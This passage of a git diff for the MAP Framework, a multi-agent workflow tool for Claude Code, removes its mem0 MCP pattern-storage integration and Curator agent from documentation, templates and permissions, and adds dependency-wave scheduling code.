} - ] - }, - "add_pattern": { - "tool": "mcp__mem0__map_add_pattern", - "description": "Store a new pattern (fingerprint-based deduplication)", - "parameters": { - "text": "Pattern text to store", - "section": "Section classification (e.g., SECURITY_PATTERNS, IMPLEMENTATION_PATTERNS)", - "scope": "Target namespace (branch/project/org)", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "run_id": "Tier-scoped run identifier (e.g., \"proj:my-app:branch:feat-auth\")", - "agent_origin": "Agent that created the pattern (e.g., \"curator\")", - "code_example": "Optional code example demonstrating the pattern", - "tech_stack": "Optional technology stack (e.g., [\"python\", \"sqlalchemy\"])", - "tags": "Optional tags for cross-referencing (e.g., [\"security\", \"jwt\"])" - }, - "note": "Should be called through Curator agent for deduplication" - }, - "archive_pattern": { - "tool": "mcp__mem0__map_archive_pattern", - "description": "Mark a pattern as deprecated", - "parameters": { - "memory_id": "ID of the pattern to archive", - "reason": "Reason for archiving", - "superseded_by": "Optional memory_id of the replacement pattern", - "archived_by": "Agent performing the archival (e.g., \"curator\")" - } - }, - "promote_pattern": { - "tool": "mcp__mem0__map_promote_pattern", - "description": "Promote a pattern to a higher tier", - "parameters": { - "memory_id": "ID of the pattern to promote", - "target_scope": "Target tier (\"project\" or \"org\")", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "target_run_id": "Target tier run identifier (e.g., \"proj:my-app\")", - "promoted_by": "Agent or mechanism performing promotion (e.g., \"auto\")", - "promotion_reason": "Reason for promotion (e.g., \"helpful_count >= 5\")" - } - } - }, "common_patterns": { - "mem0_search": { - "description": "mem0 provides semantic search across tiered namespaces", - "method": "Semantic search (embedding-based)", - "speed": "Low latency (<200ms)", - 
"use_case": "Pattern retrieval, conceptual search, similar patterns", - "syntax": "Natural language queries" - }, "stdin_support": { "description": "Commands that accept stdin input", "commands": [ @@ -246,42 +176,12 @@ { "category": "legacy_command", "mistake": "mapify playbook ...", - "reason": "Legacy playbook CLI commands removed in v4.0+", - "correction": "mcp__mem0__map_tiered_search(query=\"...\")", - "explanation": "Use mem0 MCP tools for pattern storage and retrieval" - }, - { - "category": "wrong_approach", - "mistake": "Direct mem0 writes without Curator", - "reason": "Bypasses deduplication and quality scoring", - "correction": "Task(subagent_type=\"curator\", ...)", - "explanation": "Curator handles fingerprint-based deduplication" + "reason": "Legacy playbook CLI commands removed", + "correction": "Use slash commands (/map-efficient, /map-learn, etc.)", + "explanation": "Use MAP slash commands for workflow operations" } ] }, - "integration_notes": { - "map_workflow": { - "description": "How MAP agents use mem0 MCP", - "curator_agent": { - "role": "Manages knowledge base via mem0 MCP", - "workflow": [ - "1. Curator analyzes reflector insights", - "2. Searches mem0 for duplicates via mcp__mem0__map_tiered_search", - "3. Stores new patterns via mcp__mem0__map_add_pattern", - "4. Archives outdated patterns via mcp__mem0__map_archive_pattern" - ], - "critical_rule": "NEVER write patterns directly - always use Curator agent" - }, - "reflector_agent": { - "role": "Searches for existing patterns before extracting new ones", - "workflow": [ - "1. Search mem0 for similar patterns via mcp__mem0__map_tiered_search", - "2. Extract only novel patterns", - "3. 
Pass to Curator for storage"
-        ]
-      }
-    }
-  },
  "metadata": {
    "generated_from": "src/mapify_cli/__init__.py",
    "command_definitions": [
diff --git a/docs/COMPLETE_WORKFLOW.md b/docs/COMPLETE_WORKFLOW.md
index 1a6adfa..ccb052d 100644
--- a/docs/COMPLETE_WORKFLOW.md
+++ b/docs/COMPLETE_WORKFLOW.md
@@ -124,9 +124,9 @@ Validation:
┌─────────────────────────────────────────────────────────────┐
│ Turn 2: Начало ST-001 │
├─────────────────────────────────────────────────────────────┤
-│ • map_orchestrator → "Step 2.1: MEM0_SEARCH" │
-│ • Hook: "⚠️ Call mcp__mem0__map_tiered_search BEFORE Actor" │
-│ • Поиск существующих паттернов OAuth в mem0 │
+│ • map_orchestrator → "Step 2.2: RESEARCH" │
+│ • Hook: "⚠️ Gather context BEFORE Actor" │
+│ • Поиск существующих паттернов OAuth │
└─────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────┐
@@ -135,7 +135,7 @@
│ • map_orchestrator → "Step 2.3: ACTOR" │
│ • Hook: "⚠️ Use Edit/Write tools to apply code directly" │
│ • Actor: │
-│ 1. Анализирует паттерны из mem0 │
+│ 1. Анализирует существующий код │
│ 2. Генерирует config/oauth.py │
│ 3. ЗАПИСЫВАЕТ код с Write("/path/to/file", content) │
│ • 🆕 Код уже на диске! │
└─────────────────────────────────────────────────────────────┘
@@ -410,7 +410,6 @@ How to proceed?
/map-learn "OAuth 2.0 implementation with CSRF protection" # Reflector извлекает уроки -# Curator сохраняет паттерны в mem0 MCP # Паттерны доступны для будущих проектов ``` diff --git a/docs/INSTALL.md b/docs/INSTALL.md index 5d8788e..646a4a2 100644 --- a/docs/INSTALL.md +++ b/docs/INSTALL.md @@ -147,11 +147,10 @@ mapify init my-project This will: - ✅ Create project directory -- ✅ Install 12 MAP agents (including ACE Reflector & Curator, Synthesizer, DebateArbiter, ResearchAgent, FinalVerifier) +- ✅ Install MAP agents (including Synthesizer, DebateArbiter, ResearchAgent, FinalVerifier) - ✅ Add 10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-learn, /map-review, /map-release, /map-check, /map-plan, /map-resume) - ✅ Configure essential MCP servers - ✅ Initialize git repository -- ✅ Configure ACE learning system (mem0 MCP) **Note:** MAP Framework is designed for Claude Code. All generated agents and commands are optimized for the Claude Code CLI. @@ -224,8 +223,7 @@ If you prefer manual setup: │ │ ├── monitor.md # Validates implementations │ │ ├── predictor.md # Analyzes impact and risks │ │ ├── evaluator.md # Scores solution quality - │ │ ├── reflector.md # ACE: Extracts lessons - │ │ ├── curator.md # ACE: Manages knowledge base + │ │ ├── reflector.md # Extracts lessons │ │ ├── synthesizer.md # Self-MoA: Merges variants │ │ ├── debate-arbiter.md # Opus: Cross-evaluates variants │ │ ├── research-agent.md # Isolated codebase research @@ -245,8 +243,6 @@ If you prefer manual setup: │ └── mcp_config.json ``` -> **Note (v4.0+):** Pattern storage uses mem0 MCP with tiered namespaces (branch → project → org). 
- ## Verify Installation Check that everything is installed correctly: @@ -304,42 +300,14 @@ MAP Framework uses **slash commands** as entry points that coordinate specialize - **`/map-plan`** - Architect phase only: decompose task without implementation - **`/map-release`** - Package release workflow with validation gates - **`/map-resume`** - Resume incomplete MAP workflow from checkpoint -- **`/map-learn`** - Extract lessons: reflector → curator → mem0 storage +- **`/map-learn`** - Extract lessons from completed workflows **Note:** Agents are invoked automatically by slash commands. Direct agent invocation is not the recommended approach—use the slash commands above for proper workflow orchestration. -### Learning System (mem0 MCP) - -MAP automatically learns from your work through the mem0 tiered memory system: - -```bash -# Search for relevant patterns via mem0 MCP -# In Claude Code, Curator agent calls: -mcp__mem0__map_tiered_search("JWT authentication") - -# Add new patterns via Curator agent -mcp__mem0__map_add_pattern(content="...", category="security", tier="project") -``` - -> **Note (v4.0+):** Pattern storage uses mem0 MCP with tiered namespaces (branch → project → org). - ## MCP Server Setup If you selected MCP servers during installation, ensure they're configured: -### mem0 (Knowledge Management) - RECOMMENDED - -**Overview:** - -- Tiered pattern storage (branch → project → org) -- Semantic search across all tiers -- Fingerprint-based deduplication -- Enables cross-project learning - -**Setup:** - -See mem0 MCP server documentation for installation instructions. - ### Claude-Reviewer (Professional Review) - Automated security and quality analysis @@ -364,22 +332,6 @@ See mem0 MCP server documentation for installation instructions. 
- Analyze architectural patterns - Learn from production implementations -## ACE Learning (Knowledge Management) - -The MAP Framework includes an ACE-style learning system via mem0 MCP: - -- **Reflector agent**: Extracts lessons from successes and failures -- **Curator agent**: Maintains structured knowledge base via mem0 MCP -- **mem0 tiered storage**: Patterns stored across namespaces (branch → project → org) with categories: - - implementation - - security - - architecture - - debugging - - testing - - performance - -> **Note (v4.0+):** Pattern storage uses mem0 MCP. The system automatically grows as you use MAP commands with fingerprint-based deduplication. - ## Optional: Semantic Search For enhanced pattern retrieval using semantic similarity instead of keyword matching: @@ -499,17 +451,6 @@ ls ~/.claude/local/claude Check that MCP servers are properly configured in your Claude Code settings. The configuration file is at `.claude/mcp_config.json`. -### Issue: Pattern search not working (mem0 MCP) - -As of v4.0, pattern storage and retrieval is handled by the mem0 MCP server (not local semantic search). - -Verify that: - -- mem0 MCP is enabled in your Claude Code MCP configuration (`.claude/mcp_config.json` or Claude settings) -- the mem0 MCP server is reachable from Claude Code - -If mem0 is misconfigured, you may see missing context in workflows that call `mcp__mem0__map_tiered_search`. 
- ## Uninstalling To remove MAP Framework: @@ -520,7 +461,6 @@ rm -rf .claude/agents/ rm -rf .claude/commands/ rm .claude/mcp_config.json rm -rf .claude/embeddings_cache/ -# Note: mem0 data is managed by mem0 MCP server, not local files # Uninstall mapify CLI uv tool uninstall mapify-cli diff --git a/docs/USAGE.md b/docs/USAGE.md index 1e1d016..e26d2c3 100644 --- a/docs/USAGE.md +++ b/docs/USAGE.md @@ -15,13 +15,10 @@ Complete usage examples, best practices, and optimization strategies for the MAP - [When to Use Self-MoA](#when-to-use-self-moa) - [Example Synthesis](#example-synthesis) - [Token Cost Considerations](#token-cost-considerations) -- [Pattern Storage & Retrieval (mem0 MCP)](#-pattern-storage--retrieval-mem0-mcp) - [Common CLI Mistakes](#-common-cli-mistakes) - - [Wrong Approach](#wrong-approach-critical) - [Wrong Operation Field Name](#wrong-operation-field-name) - [Quick Reference Resources](#quick-reference-resources) - [Validation Tools](#validation-tools) -- [Pattern Search Tips (mem0 MCP)](#-pattern-search-tips-mem0-mcp) - [Dependency Validation](#dependency-validation) - [Basic Usage](#basic-usage) - [Visualization Mode](#visualization-mode) @@ -170,37 +167,6 @@ Self-MoA uses ~4x tokens per subtask: --- -## 🧠 Pattern Storage & Retrieval (mem0 MCP) - -As of v4.0, patterns are stored and retrieved via the mem0 MCP server. There is no local CLI workflow for pattern search/update. - -### Tiered Pattern Search - -Use `mcp__mem0__map_tiered_search` to search across scopes (branch → project → org): - -```bash -# Basic search -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Narrow search by section (example) -mcp__mem0__map_tiered_search(query="error handling", section_filter="ERROR_HANDLING_PATTERNS", limit=10) -``` - -### Adding / Archiving Patterns - -Patterns should be written through the Curator agent (deduplication + fingerprinting): - -```bash -Task(subagent_type="curator", ...) 
- -# Curator uses mem0 MCP tools: -# - mcp__mem0__map_add_pattern -# - mcp__mem0__map_archive_pattern -# - mcp__mem0__map_promote_pattern -``` - ---- - ## ⚠️ Common CLI Mistakes This section documents frequently encountered CLI command errors and their corrections. These validations are enforced by: @@ -208,22 +174,6 @@ This section documents frequently encountered CLI command errors and their corre - E2E tests (`tests/test_agent_cli_correctness.py`) - Agent template CLI reference sections -### Common Mistakes (v4.0+) - -| ❌ Incorrect | ✅ Correct | Explanation | -|-------------|-----------|-------------| -| Using legacy CLI commands (`mapify playbook ...`) | Use `mcp__mem0__map_tiered_search` | Legacy CLI is not used for patterns in v4.0+ | -| Calling mem0 tools directly from workflow docs | Use `Task(subagent_type="curator", ...)` for writes | Curator handles dedupe + quality scoring | - -### Wrong Approach (CRITICAL) - -| ❌ NEVER DO THIS | ✅ ALWAYS USE THIS | Why | -|------------------|-------------------|-----| -| Direct mem0 MCP calls without Curator | `Task(subagent_type="curator", ...)` | Curator validates quality, checks duplicates via tiered search | -| Manually creating patterns | `mcp__mem0__map_add_pattern` via Curator | Fingerprint-based deduplication prevents duplicates | - -> **Note (v4.0+):** Pattern storage uses mem0 MCP. Use mem0 tools: `mcp__mem0__map_tiered_search`, `mcp__mem0__map_add_pattern`, `mcp__mem0__map_archive_pattern`. - ### Wrong Operation Field Name | ❌ Incorrect JSON | ✅ Correct JSON | @@ -272,36 +222,6 @@ git commit --no-verify # NOT RECOMMENDED --- -## 🧠 Pattern Storage (mem0 MCP) - -> **v4.0+** — Pattern storage uses mem0 MCP. The legacy Knowledge Graph SQLite modules have been removed. - -Pattern retrieval, contradiction detection, and knowledge management are all handled through mem0 MCP tools. See the Pattern Search Tips section below for practical usage. 
- ---- - -## 🔍 Pattern Search Tips (mem0 MCP) - -As of v4.0, pattern search is provided by mem0 MCP. Unlike legacy FTS5-based search, mem0 search is semantic and works best with descriptive queries. - - -### Practical Query Guidelines - -- Include the concrete technology and intent (e.g. "JWT refresh tokens", "Go error handling") -- Add qualifiers when results are too broad (e.g. "PostgreSQL", "FastAPI", "rate limiting") -- Prefer natural language for conceptual lookups (e.g. "how to handle retries with jitter") - -```bash -# Basic search (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# More specific query -mcp__mem0__map_tiered_search(query="retry with exponential backoff and jitter", limit=5) - -# Section-filtered search (when you know the category) -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ## 🔄 Handling Context Compaction MAP workflows automatically save progress to the `.map/` directory, which persists across context compactions. This ensures your work is never lost, even if the conversation context is cleared. @@ -913,7 +833,7 @@ MAP Framework offers three primary implementation workflows with different trade - ✅ Refactoring with clear scope **Why it's better than /map-fast:** -- Learning available via `/map-learn` after workflow (Reflector/Curator) +- Learning available via `/map-learn` after workflow (Reflector) - Conditional Predictor catches high-risk issues - Final-Verifier provides adversarial verification - Only 10% less token savings but much safer @@ -1079,10 +999,9 @@ MAP Framework offers three primary implementation workflows with different trade - Low-risk tasks (simple CRUD, UI updates) skip impact analysis 2. 
**Learning Decoupled to /map-learn** (token savings during main workflow) - - Reflector and Curator are NOT called during /map-efficient execution + - Reflector is NOT called during /map-efficient execution - Run `/map-learn` after workflow completes to extract patterns - Reflector then analyzes ALL subtasks together (batched, more holistic insights) - - Curator makes a single knowledge base update (deduplication via mem0) 3. **Evaluator Not Invoked** (8-12% savings) - Monitor provides sufficient validation for most tasks @@ -1091,7 +1010,7 @@ MAP Framework offers three primary implementation workflows with different trade - Quality still ensured by Monitor's comprehensive checks **What's Preserved:** -- ✅ Learning available via `/map-learn` (Reflector + Curator, optional after workflow) +- ✅ Learning available via `/map-learn` (Reflector, optional after workflow) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) - ✅ Essential quality gates (Monitor validation) @@ -1144,7 +1063,7 @@ START: I need to implement a feature **✅ Reality:** Monitor still validates every subtask. Evaluator is not invoked (it only runs in /map-debug and /map-review), but Tests gate, Linter gate, and Final-Verifier ensure quality. **❌ Misconception:** "Learning via /map-learn is inferior to per-subtask learning" -**✅ Reality:** /map-learn runs Reflector/Curator after the workflow completes, analyzing ALL subtasks together. This batched approach sees patterns ACROSS subtasks, often producing better insights than isolated per-subtask analysis. +**✅ Reality:** /map-learn runs Reflector after the workflow completes, analyzing ALL subtasks together. This batched approach sees patterns ACROSS subtasks, often producing better insights than isolated per-subtask analysis. ## 🎯 Best Practices @@ -1163,12 +1082,11 @@ The Actor agent now includes a 10-item Quality Checklist for self-review before 2. Explicit error handling (no silent failures) 3. 
Security review (SQL injection, XSS, sensitive data) 4. Test case identification (happy path + edge cases) -5. MCP tools usage (mcp__mem0__map_tiered_search, context7) +5. MCP tools usage (context7, sequential-thinking) 6. Template variable preservation (orchestration compatibility) 7. Trade-offs documentation (decision rationale) -8. Pattern tracking (ACE feedback loop) -9. Complete implementations (no ellipsis or placeholders) -10. Dependency justification (no unnecessary libraries) +8. Complete implementations (no ellipsis or placeholders) +9. Dependency justification (no unnecessary libraries) **How it works:** - Actor performs self-review before submission @@ -1252,7 +1170,6 @@ MAP Framework supports intelligent model selection per agent to balance capabili | **Monitor** | sonnet | Quality validation requires thoroughness | ➡️ | | **TaskDecomposer** | sonnet | Requires good understanding of requirements | ➡️ | | **Reflector** | sonnet | Pattern extraction needs reasoning | ➡️ | -| **Curator** | sonnet | Knowledge management requires care | ➡️ | | **DocumentationReviewer** | sonnet | Documentation analysis needs thoroughness | ➡️ | ### Cost Impact of Model Upgrades @@ -1270,12 +1187,12 @@ The upgrade of Predictor and Evaluator from haiku to sonnet provides: **1. Use `/map-efficient` workflow (RECOMMENDED)** - Skips Evaluator per subtask (Monitor provides sufficient validation) - Conditional Predictor (only called for high-risk changes) -- Reflector/Curator available via `/map-learn` after workflow +- Reflector available via `/map-learn` after workflow - **Token savings: 30-40%** **2. Use `/map-fast` for small, low-risk changes** - Minimal agent sequence: TaskDecomposer → Actor → Monitor -- Skips: Predictor, Evaluator, Reflector, Curator +- Skips: Predictor, Evaluator, Reflector - **Token savings: 40-50%** (but no learning!) 
### How It Works @@ -1448,7 +1365,6 @@ Skills follow the 500-line rule: **System architecture:** - `agent-architecture.md` - How 12 agents orchestrate -- `mem0-patterns.md` - Knowledge storage, quality scoring ### Creating Custom Skills @@ -1467,7 +1383,6 @@ MAP Framework implements defense-in-depth security via three complementary layer ### Layer 1: Behavioral Rules (CLAUDE.md) Guidelines in `.claude/CLAUDE.md` that guide agent behavior: -- NEVER skip mem0 deduplication checks - NEVER write code as orchestrator - NEVER commit .env files @@ -1896,7 +1811,7 @@ MAP: [Prompt Improver Hook seeking clarification] User: [Selects option] -MAP: [Proceeds with full context + mem0 patterns] +MAP: [Proceeds with full context] ``` **Bypass options:** @@ -1920,7 +1835,7 @@ MAP: [Proceeds with full context + mem0 patterns] MAP uses **multiple UserPromptSubmit hooks** that run in parallel: 1. **Prompt-Improver** – Disambiguates vague prompts (wraps prompt with evaluation instructions) -2. **Pattern Injection** – Adds relevant mem0 patterns, and suggests workflows and skills +2. **Pattern Injection** – Adds relevant patterns, and suggests workflows and skills > **Note:** Claude Code executes all matching hooks in parallel. Each hook's `additionalContext` output is concatenated and added to the prompt. The order is not guaranteed, but both enhancements are applied. 
@@ -1928,7 +1843,7 @@ MAP uses **multiple UserPromptSubmit hooks** that run in parallel: **Benefits:** - Both hooks enhance the prompt with different types of context -- Prompt-Improver adds evaluation wrapper, Pattern Injection adds mem0 patterns/workflows/skills +- Prompt-Improver adds evaluation wrapper, Pattern Injection adds patterns/workflows/skills - Modular design (hooks can be disabled independently) - Parallel execution (efficient) diff --git a/docs/WORKFLOW_FLOW.md b/docs/WORKFLOW_FLOW.md index 2f7f299..9ee80f6 100644 --- a/docs/WORKFLOW_FLOW.md +++ b/docs/WORKFLOW_FLOW.md @@ -131,17 +131,8 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 5: get_next_step → step_id=2.1, MEM0_SEARCH │ -│ │ -│ Hook НАПОМИНАЕТ перед КАЖДЫМ Tool call: │ -│ ⚠️ "Call mcp__mem0__map_tiered_search BEFORE Actor" -│ │ -│ Выполняет: mcp__mem0__map_tiered_search(...) │ -│ Валидирует: validate_step "2.1" │ -└──────────────────┬──────────────────────────────────┘ - ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 6: get_next_step → step_id=2.3, ACTOR │ +│ Turn 5: get_next_step → step_id=2.3, ACTOR │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Launch Task(subagent_type='actor')" │ @@ -151,7 +142,7 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 7: get_next_step → step_id=2.4, MONITOR │ +│ Turn 6: get_next_step → step_id=2.4, MONITOR │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Launch Task(subagent_type='monitor')" │ @@ -165,7 +156,7 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 8: get_next_step → step_id=2.7, UPDATE_STATE │ +│ Turn 7: get_next_step → step_id=2.7, UPDATE_STATE │ │ │ │ Выполняет: Edit/Write tools │ │ │ @@ -176,11 +167,11 @@ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 9-10: 
TESTS_GATE → LINTER_GATE │ +│ Turn 8-9: TESTS_GATE → LINTER_GATE │ └──────────────────┬──────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────┐ -│ Turn 11: get_next_step → step_id=2.10, VERIFY │ +│ Turn 10: get_next_step → step_id=2.10, VERIFY │ │ │ │ Hook НАПОМИНАЕТ: │ │ ⚠️ "Output self-audit before marking complete" │ @@ -214,7 +205,6 @@ | **1.56** | CHOOSE_MODE | Выбор режима выполнения (step_by_step\|batch) | ✅ Да | | **1.6** | INIT_STATE | Создание workflow_state.json | ✅ Да | | **2.0** | XML_PACKET | Построение AI-friendly пакета | ✅ Да (для каждого ST) | -| **2.1** | MEM0_SEARCH | Поиск паттернов в mem0 | ✅ Да (для каждого ST) | | **2.2** | RESEARCH | research-agent для контекста | 🔶 Условно (если 3+ файлов) | | **2.3** | ACTOR | Actor генерирует код | ✅ Да (для каждого ST) | | **2.4** | MONITOR | Monitor валидирует (retry до 5 раз) | ✅ Да (для каждого ST) | @@ -295,7 +285,7 @@ Claude видит: 19 шагов, 163 строки circuit breaker, 103 стро ↓ Claude "компрессирует" ментально: "Ok, просто запусти agents и пиши код" ↓ -⚠️ Пропускает: mem0 search (80%), self-audit (90%) +⚠️ Пропускает: research (80%), self-audit (90%) ``` ### ✅ Новый подход (v2.0.0) @@ -308,22 +298,17 @@ Turn 1: map_orchestrator говорит: "Step 1.0: Call task-decomposer" ↓ Claude: [Вызывает task-decomposer] ✅ ↓ -Turn 2: map_orchestrator говорит: "Step 2.1: Call mem0 search" - Hook напоминает: "⚠️ MANDATORY: Call mem0 BEFORE Actor" - ↓ -Claude: [Вызывает mem0] ✅ - ↓ -Turn 3: map_orchestrator говорит: "Step 2.3: Call Actor" +Turn 2: map_orchestrator говорит: "Step 2.3: Call Actor" Hook напоминает: "⚠️ MANDATORY: Launch Actor" ↓ Claude: [Вызывает Actor] ✅ ↓ -Turn 4: map_orchestrator говорит: "Step 2.4: Call Monitor" +Turn 3: map_orchestrator говорит: "Step 2.4: Call Monitor" Hook напоминает: "⚠️ MANDATORY: Launch Monitor" ↓ Claude: [Вызывает Monitor] ✅ ↓ -Turn 5: map_orchestrator говорит: "Step 2.7: Apply changes" +Turn 4: map_orchestrator говорит: "Step 2.7: Apply 
changes" Gate проверяет: actor+monitor выполнены ✅ ↓ Claude: [Применяет Edit/Write] ✅ @@ -360,9 +345,9 @@ CHECKPOINT: Calling task-decomposer Turn 5: ═══════════════════════════════════════════════════ MAP WORKFLOW CHECKPOINT -Current Step: 2.1 - MEM0_SEARCH +Current Step: 2.3 - ACTOR Progress: Subtask 1/5 -⚠️ MANDATORY: Call mem0 BEFORE Actor +⚠️ MANDATORY: Launch Actor ═══════════════════════════════════════════════════ Turn 8: diff --git a/requirements-semantic.txt b/requirements-semantic.txt deleted file mode 100644 index 3012bdc..0000000 --- a/requirements-semantic.txt +++ /dev/null @@ -1,13 +0,0 @@ -# Semantic Search Dependencies for ACE Playbook -# Install with: pip install -r requirements-semantic.txt - -# Core semantic search -sentence-transformers>=2.2.0 # ~500MB model download on first use -numpy>=1.24.0 # Vector operations -scikit-learn>=1.3.0 # Cosine similarity - -# Keras compatibility fix (required for transformers library) -tf-keras # Keras 2 (backwards-compatible with Keras 3) - -# Optional: Faster similarity search for large playbooks (100+ bullets) -# faiss-cpu>=1.7.4 # Facebook AI Similarity Search (uncomment if needed) diff --git a/src/mapify_cli/__init__.py b/src/mapify_cli/__init__.py index 4747953..ce297a5 100644 --- a/src/mapify_cli/__init__.py +++ b/src/mapify_cli/__init__.py @@ -538,7 +538,6 @@ def create_agent_files(project_path: Path, mcp_servers: List[str]) -> None: "predictor": create_predictor_content(mcp_servers), "evaluator": create_evaluator_content(mcp_servers), "reflector": create_reflector_content(mcp_servers), - "curator": create_curator_content(mcp_servers), "documentation-reviewer": create_documentation_reviewer_content( mcp_servers ), @@ -827,7 +826,7 @@ def create_reflector_content(mcp_servers: List[str]) -> str: return f"""--- name: reflector -description: Extracts structured lessons from execution attempts (ACE) +description: Extracts structured lessons from execution attempts tools: Read, Grep, Glob model: sonnet --- @@ 
-855,44 +854,6 @@ def create_reflector_content(mcp_servers: List[str]) -> str: """ -def create_curator_content(mcp_servers: List[str]) -> str: - """Create curator agent content""" - mcp_section = "" - - return f"""--- -name: curator -description: Manages structured patterns with incremental updates (ACE) -tools: Read, Write, Edit -model: sonnet ---- - -# IDENTITY - -You are a knowledge curator who maintains the ACE pattern store by integrating Reflector insights. -{mcp_section} -# ROLE - -Integrate Reflector insights into patterns using delta operations: -- ADD: New pattern bullets -- UPDATE: Increment helpful/harmful counters -- DEPRECATE: Remove harmful patterns - -## Quality Gates - -- Content length ≥ 100 characters -- Code examples for technical patterns -- Deduplication via semantic similarity -- Technology-specific (not generic advice) - -## Output Format (JSON) - -Return JSON with: -- reasoning: Why these operations improve patterns -- operations: Array of ADD/UPDATE/DEPRECATE operations -- deduplication_check: What duplicates were found -""" - - # Note: test-generator agent removed @@ -1086,7 +1047,7 @@ def create_command_files(project_path: Path) -> None: $ARGUMENTS -Call Reflector to extract patterns, then Curator to update pattern store. +Call Reflector to extract patterns from recent workflow. 
""", } @@ -1289,8 +1250,6 @@ def create_or_merge_project_settings_local(project_path: Path) -> None: default_permissions: Dict[str, Any] = { "allow": [ - # Allow all mem0 MCP tools (project-scoped) - "mcp__mem0__*", # SourceCraft MCP helpers (project-scoped) "mcp__sourcecraft__list_pull_request_comments", # Common safe Go workflows (project-scoped) @@ -1360,7 +1319,6 @@ def create_mcp_config(project_path: Path, mcp_servers: List[str]) -> None: "predictor": [], "evaluator": [], "reflector": [], - "curator": [], "documentation-reviewer": [], "debate-arbiter": [], "synthesizer": [], diff --git a/src/mapify_cli/dependency_graph.py b/src/mapify_cli/dependency_graph.py index 7c6dda0..f4b8f92 100644 --- a/src/mapify_cli/dependency_graph.py +++ b/src/mapify_cli/dependency_graph.py @@ -327,6 +327,124 @@ def dfs(node_id: str) -> None: return result + def compute_waves(self) -> Optional[List[List[str]]]: + """ + Compute execution waves from the dependency DAG using Kahn's algorithm. + + Each wave contains subtasks whose dependencies are all satisfied by + prior waves. Within a wave, subtasks can execute in parallel. + + Returns: + List of waves (each wave is a list of subtask IDs), or None if + cycle detected. Empty graph returns []. 
+ + Performance: O(V+E) where V = nodes, E = edges + + Example: + >>> graph = DependencyGraph() + >>> graph.add_node(SubtaskNode(id="ST-001", dependencies=[])) + >>> graph.add_node(SubtaskNode(id="ST-002", dependencies=["ST-001"])) + >>> graph.add_node(SubtaskNode(id="ST-003", dependencies=["ST-001"])) + >>> graph.add_node(SubtaskNode(id="ST-004", dependencies=["ST-002", "ST-003"])) + >>> graph.compute_waves() + [['ST-001'], ['ST-002', 'ST-003'], ['ST-004']] + """ + if not self.nodes: + return [] + + # Compute in-degree for each node (only count edges to nodes in graph) + in_degree: Dict[str, int] = {nid: 0 for nid in self.nodes} + for nid, node in self.nodes.items(): + for dep_id in node.dependencies: + if dep_id in self.nodes: + in_degree[nid] += 1 + + # Collect initial zero-in-degree nodes as wave 0 + waves: List[List[str]] = [] + current_wave = sorted( + [nid for nid, deg in in_degree.items() if deg == 0] + ) + + processed = 0 + while current_wave: + waves.append(current_wave) + processed += len(current_wave) + next_wave_set: Set[str] = set() + + for nid in current_wave: + # Decrement in-degree for all dependents + for dependent_id in self.get_dependents(nid): + in_degree[dependent_id] -= 1 + if in_degree[dependent_id] == 0: + next_wave_set.add(dependent_id) + + current_wave = sorted(next_wave_set) + + # If not all nodes processed, there's a cycle + if processed != len(self.nodes): + return None + + return waves + + def split_wave_by_file_conflicts( + self, wave: List[str], affected_files_map: Dict[str, Set[str]] + ) -> List[List[str]]: + """ + Split a single wave into sub-waves where no two subtasks share files. + + Uses greedy coloring: each subtask is placed in the first sub-wave + that has no file overlap. Subtasks with empty/unknown affected_files + are treated as conflicting with all others (placed alone). 
+ + Args: + wave: List of subtask IDs in one wave + affected_files_map: Dict mapping subtask_id -> set of affected file paths + + Returns: + List of sub-waves where no two subtasks in the same sub-wave share files + + Example: + >>> graph = DependencyGraph() + >>> wave = ["ST-002", "ST-003", "ST-004"] + >>> files = {"ST-002": {"a.py"}, "ST-003": {"b.py"}, "ST-004": {"a.py"}} + >>> graph.split_wave_by_file_conflicts(wave, files) + [['ST-002', 'ST-003'], ['ST-004']] + """ + if len(wave) <= 1: + return [wave] if wave else [] + + sub_waves: List[List[str]] = [] + sub_wave_files: List[Set[str]] = [] + + for subtask_id in wave: + files = affected_files_map.get(subtask_id, set()) + + # Empty/unknown files = conflict with everything, place alone + if not files: + sub_waves.append([subtask_id]) + sub_wave_files.append(set()) # placeholder + continue + + placed = False + for i, sw_files in enumerate(sub_wave_files): + # Skip sub-waves that contain an "unknown files" subtask + # (those have empty sw_files but exist in sub_waves) + if not sw_files and sub_waves[i]: + # This sub-wave has a subtask with unknown files + continue + # Check for file overlap + if not files & sw_files: + sub_waves[i].append(subtask_id) + sub_wave_files[i] |= files + placed = True + break + + if not placed: + sub_waves.append([subtask_id]) + sub_wave_files.append(set(files)) + + return sub_waves + def clear(self) -> None: """ Remove all nodes from graph. diff --git a/src/mapify_cli/templates/CLAUDE.md b/src/mapify_cli/templates/CLAUDE.md index 45550f3..74d928d 100644 --- a/src/mapify_cli/templates/CLAUDE.md +++ b/src/mapify_cli/templates/CLAUDE.md @@ -37,7 +37,6 @@ Verification: ## Safety expectations - Don't add or expose secrets. Avoid reading/writing `.env*` and credential/key files. -- When changing pattern storage behavior, ensure Curator-mediated writes through mem0 MCP are preserved (see `.claude/agents/curator.md` and `docs/ARCHITECTURE.md`). 
